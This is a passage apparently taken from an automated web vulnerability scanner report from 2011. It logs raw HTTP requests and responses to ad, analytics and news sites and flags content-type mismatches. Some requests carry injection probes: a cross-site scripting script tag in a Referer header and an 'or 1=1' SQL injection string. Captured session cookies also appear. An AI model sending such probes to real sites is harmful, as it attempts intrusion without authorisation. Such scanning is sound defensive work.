27.129. http://onset.freedom.com/fi/analytics/cms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onset.freedom.com
Path:	/fi/analytics/cms/

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:24 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Fri, 28 Jan 2011 19:37:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28783

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...

27.130. http://pixel.invitemedia.com/rubicon_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

27.131. http://support.moxiesoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.moxiesoft.com
Path:	/

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.132. http://tags.expo9.exponential.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.expo9.exponential.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

27.133. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Request

Response

27.134. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Request

Response

27.135. http://voken.eyereturn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; cmggl=1; er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
ETag: W/"147-1285032287000"
Last-Modified: Tue, 21 Sep 2010 01:24:47 GMT
Content-Type: text/html
Content-Length: 147
Date: Sat, 29 Jan 2011 01:41:38 GMT
Connection: close
Server: eyeReturn Ad Serveri 6

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
</head>
<body>
</body>
</html>

27.136. http://widgets.mobilelocalnews.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.mobilelocalnews.com
Path:	/

Request

GET /?uid=42b39fdb198522d2bfc6b1f64cd98365 HTTP/1.1
Host: widgets.mobilelocalnews.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:58 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 8312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Bo
...[SNIP]...

27.137. http://www.moxiesoft.com/tal_products/chat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat.aspx

Request

GET /tal_products/chat.aspx?ac=PPC.B.live chat HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 28 Jan 2011 13:59:24 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

27.138. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Request

Response

27.139. http://www.parkersoft.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.parkersoft.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; whoson=530-50268.8034574

Response

HTTP/1.1 404 Not Found
Content-Length: 1188
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 13:58:01 GMT

...<html>
<head>
<title>Parker Software</title>
<meta http-equiv="REFRESH" content="3; URL=http://www.email2db.com">
<link rel="stylesheet" type="text/css" href="http://www.email2db.co
...[SNIP]...

27.140. http://www.screenthumbs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 404 Not Found
Content-Length: 1070
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 21:52:15 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at scre&#10
...[SNIP]...

27.141. http://www.screenthumbs.com/inc/nshots.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/inc/nshots.php

Request

GET /inc/nshots.php HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<img style="margin: 0 5px 0 5px;" src="/thumb?appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthomerecent&url=http://angkasawanassociationofmalaysia.blogspot.com" /><img style="margin: 0 5px 0
...[SNIP]...

27.142. http://www.screenthumbs.com/inc/qstats.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/inc/qstats.php

Request

GET /inc/qstats.php HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<table width="100%" border="0" cellspacing="0" cellpadding="3">

<tr>
<td class="bbotdot">14,277,651</td>
<td align="left" class="bbotdot">thumbnails captured</td>

...[SNIP]...

27.143. http://www.screenthumbs.com/tools/js/linkthumbs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/tools/js/linkthumbs.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

var linkthumbs_url = 'http://www.screenthumbs.com/thumb?direct=1&appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome&format=0&width=200&height=150&url=';

var linkthumbs_clsNames = ['', 'type2'];
...[SNIP]...

27.144. http://www.spicefactory.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spicefactory.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.spicefactory.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:47:38 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 337

<HTML>
<HEAD>
</HEAD>

<BODY BGCOLOR="#FFFFFF">

<TABLE ALIGN=CENTER>
<TR>
<TD>
<P ALIGN=JUSTIFY>
<H2>Fehler </H2>
<H1>
Die Datei konnte nicht gefunden werden </H1>
<
...[SNIP]...

28. Content type incorrectly stated previous next
There are 44 instances of this issue:

http://4c28d6.r.axf8.net/mr/a.gif
http://amch.questionmarket.com/adscgen/st.php
http://ar.voicefive.com/b/rc.pli
http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg
http://b.scorecardresearch.com/favicon.ico
http://b3.mookie1.com/favicon.ico
http://base.liveperson.net/hcp/html/mTag.js
http://base.liveperson.net/visitor/addons/deploy.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://common.onset.freedom.com/fi/adsense/
http://common.onset.freedom.com/fi/analytics/cms/
http://event.adxpose.com/event.flow
http://events.cbs6albany.com/images/zbutton.gif
http://events.cbs6albany.com/json
http://hpi.rotator.hadj7.adjuggler.net/favicon.ico
http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx
http://mig.nexac.com/favicon.ico
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c
http://oascentral.bostonherald.com/favicon.ico
http://onset.freedom.com/fi/analytics/cms/
http://raw.oggifinogi.com/Service.svc/OptOutCookiePresents
http://raw.oggifinogi.com/crossdomain.xml
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl
http://twitter.com/oexchange.xrd
http://www.berkshireeagle.com/favicon.ico
http://www.bostonherald.com/home/includes/twitter.inc
http://www.bostonherald.com/projects/boston_pensions/
http://www.bostonherald.com/track/includes/twitter.inc
http://www.cbs6albany.com/images/logo.gif
http://www.moxiesoft.com/tal_products/chat.aspx
http://www.paperg.com/jsfb/embed.php
http://www.screenthumbs.com/tools/js/linkthumbs.js
http://www.spicefactory.org/parsley/schema/2.2/parsley-core.xsd
http://www.zvents.com/images/bd_bg.gif
http://www.zvents.com/images/bg_searchbar.gif
http://www.zvents.com/images/zbutton.gif
http://www.zvents.com/images/zlogo.gif
http://www.zvents.com/json
http://www.zvents.com/partner_json/search

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

28.1. http://4c28d6.r.axf8.net/mr/a.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://4c28d6.r.axf8.net
Path:	/mr/a.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

28.2. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.3. http://ar.voicefive.com/b/rc.pli previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p85001580&1296224152232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:15:04 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

28.4. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://assets.nydailynews.com
Path:	/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

28.5. http://b.scorecardresearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b.scorecardresearch.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 29 Jan 2011 17:26:10 GMT
Date: Fri, 28 Jan 2011 17:26:10 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=86400
Server: CS

File not found.

28.6. http://b3.mookie1.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b3.mookie1.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

28.7. http://base.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://base.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=5296924 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG

Response

HTTP/1.1 200 OK
Content-Length: 17314
Content-Type: application/x-javascript
Content-Location: http://base.liveperson.net/lpWeb/default_ALPHA//hcpv/emt/mtag.js?site=5296924
Last-Modified: Sun, 17 Oct 2010 14:38:28 GMT
Accept-Ranges: bytes
ETag: "4de42f686ecb1:112a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 13:59:12 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

28.8. http://base.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://base.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

28.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

28.10. http://common.onset.freedom.com/fi/adsense/ previous next

Summary

Severity:	Information
